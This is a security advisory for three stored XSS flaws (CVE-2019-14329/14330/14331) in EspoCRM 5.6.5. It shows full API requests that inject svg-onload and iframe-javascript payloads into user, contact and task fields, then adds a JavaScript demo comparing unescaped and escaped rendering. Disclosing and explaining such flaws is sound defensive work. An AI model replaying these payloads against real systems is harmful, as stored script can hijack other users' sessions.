EspoCRM 5.6.5 Stored XSS vulnerability


Affected Product: EspoCRM Version 5.6.5
Credits: Vulnerability discovered by Claudio Cinquino

CVE-2019-14329

Proof of Concept

Affected Component: Create User, parameters firstName and lastName (the request below also places the payload in title)

POST /espocrm/api/v1/User HTTP/1.1
Host: xx
User-Agent: xx
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: xx/espocrm/
Content-Type: application/json
Authorization: Basic xx=
Espo-Authorization: xx
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
Content-Length: 604
Connection: close
Cookie: ck_login_id_20=1; ck_login_language_20=en_us; PHPSESSID=xx; auth-username=xx; auth-token=xx

{"type":"regular","firstName":";<svg/onload=alert(\"Clone\")>","lastName":";<svg/onload=alert(\"Clone\")>","isActive":true,"isSuperAdmin":false,"teams":{"teamsIds":[]},"gender":"","userName":"test","salutationName":"Mr.","title":";<svg/onload=alert(\"Clone\")>","password":"xx","passwordConfirm":"xx","passwordPreview":"xx","emailAddressData":[],"emailAddress":null,"emailAddressIsOptedOut":null,"phoneNumberData":[],"phoneNumber":null,"phoneNumberIsOptedOut":null,"teamsIds":[],"teamsNames":{},"teamsColumns":{},"defaultTeamName":null,"defaultTeamId":null,"rolesIds":[],"rolesNames":{}}

 

Screenshot: https://user-images.githubusercontent.com/53221919/61717355-32f71f80-ad61-11e9-9309-9b4385ff5887.PNG

 


CVE-2019-14330

Affected Component: Create Contact, parameters firstName and lastName

POST /espocrm/api/v1/Contact HTTP/1.1
Host: xx
User-Agent: xx
Accept-Language: xx
Accept-Encoding: gzip, deflate
Referer: xx/espocrm/
Content-Type: application/json
Authorization: Basic xx=
Espo-Authorization: xx=
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
Content-Length: 574
Connection: close
Cookie: ck_login_id_20=1; ck_login_language_20=en_us; PHPSESSID=xx; auth-username=xx; auth-token=xx

{"firstName":"<input value=<><iframe/src=javascript:confirm(2)","lastName":"<input value=<><iframe/src=javascript:confirm(2)","assignedUserId":"1","assignedUserName":"t t","salutationName":"","accountsIds":[],"accountsNames":{},"accountsColumns":{},"title":null,"accountIsInactive":null,"emailAddressData":[],"emailAddress":null,"emailAddressIsOptedOut":null,"phoneNumberData":[],"phoneNumber":null,"phoneNumberIsOptedOut":null,"addressPostalCode":"","addressStreet":"","addressState":"","addressCity":"","addressCountry":"","description":null,"teamsIds":[],"teamsNames":{}}

Screenshot: Xss1

CVE-2019-14331

Affected Component: Create Task, parameter name (the request below also places a payload in parentName)

 

POST /espocrm/api/v1/Task HTTP/1.1
Host: xx
User-Agent: xx
Accept-Language: xx
Accept-Encoding: gzip, deflate
Referer: xx/espocrm/
Content-Type: application/json
Authorization: Basic x=
Espo-Authorization: x=
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
Content-Length: 457
Connection: close
Cookie: ck_login_id_20=1; ck_login_language_20=en_us; PHPSESSID=xx; auth-username=xx; auth-token=xx

{"parentId":"xx","parentType":"Contact","parentName":"<input value=<><iframe/src=javascript:confirm(2) <input value=<><iframe/src=javascript:confirm(2)","status":"Not Started","priority":"Normal","assignedUserId":"1","assignedUserName":"t t","name":"<input value=<><iframe/src=javascript:confirm(1)>","dateStartDate":null,"dateStart":null,"dateEndDate":null,"dateEnd":null,"description":null,"attachmentsIds":[],"teamsIds":[],"teamsNames":{}}

 

 

Screenshot: Xss2
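Why the three stored values above fire when the record is later displayed, and what the fix looks like, as an added example that is not EspoCRM's code: the API accepts firstName, lastName and name unchanged, so the defect sits wherever the client interpolates those fields into HTML without escaping. The render functions below are hypothetical stand-ins for such a view, one vulnerable and one hardened, fed with the exact payloads from the three request bodies.

```javascript
// Added example, not EspoCRM code. The render functions are hypothetical
// stand-ins for a client view that builds markup from stored record fields.

// Constructed records carrying the exact payloads from the advisory's request bodies.
const STORED_RECORDS = [
  { cve: "CVE-2019-14329", entity: "User",
    fields: { firstName: ';<svg/onload=alert("Clone")>', lastName: ';<svg/onload=alert("Clone")>' } },
  { cve: "CVE-2019-14330", entity: "Contact",
    fields: { firstName: "<input value=<><iframe/src=javascript:confirm(2)",
              lastName: "<input value=<><iframe/src=javascript:confirm(2)" } },
  { cve: "CVE-2019-14331", entity: "Task",
    fields: { name: "<input value=<><iframe/src=javascript:confirm(1)>" } },
];

// Escape the five characters that are significant in element content and in
// quoted attribute values. This is output encoding for an HTML text/attribute
// context only; it is not sufficient for URL or script contexts.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: field values concatenated straight into a fragment that
// is then assigned to innerHTML. Everything the attacker saved becomes markup:
// <svg onload> runs on insertion, and the "<input value=<><iframe/src=..."
// payload, deliberately left without a closing ">", still opens an <iframe>.
function renderUnsafe(fields) {
  const label = Object.values(fields).join(" ");
  return `<a class="link" href="#">${label}</a>`;
}

// Hardened pattern: same template, every interpolation escaped. The user still
// sees the stored text verbatim, but it can no longer create elements or attributes.
function renderSafe(fields) {
  const label = Object.values(fields).map(escapeHtml).join(" ");
  return `<a class="link" href="#">${label}</a>`;
}

// Check helper: report any start or end tag in the fragment other than the <a>
// the template itself emits. Coarse, but enough to flag the payloads above.
function hasInjectedTag(html) {
  const tags = html.match(/<\/?[a-zA-Z][\w-]*/g) || [];
  return tags.some((t) => !/^<\/?a$/.test(t));
}

// Render each stored record both ways and record whether foreign tags appear.
function demo() {
  return STORED_RECORDS.map((r) => {
    const unsafe = renderUnsafe(r.fields);
    const safe = renderSafe(r.fields);
    return { cve: r.cve, entity: r.entity, unsafe, safe,
             unsafeInjects: hasInjectedTag(unsafe), safeInjects: hasInjectedTag(safe) };
  });
}

for (const d of demo()) {
  console.log(`${d.cve} (${d.entity}): unsafe injects=${d.unsafeInjects}, safe injects=${d.safeInjects}`);
  console.log("  unsafe:", d.unsafe);
  console.log("  safe:  ", d.safe);
}
```

Run it with node; for every record the unsafe render contains an attacker-supplied <svg>, <input> or <iframe> tag and the safe render contains none. Note that escapeHtml only covers HTML text and quoted attribute contexts: if a stored field ever reaches an href, a style block or inline script, the encoding has to match that context, and in practice the right fix is to rely on the template engine's default escaping rather than raw string interpolation into innerHTML.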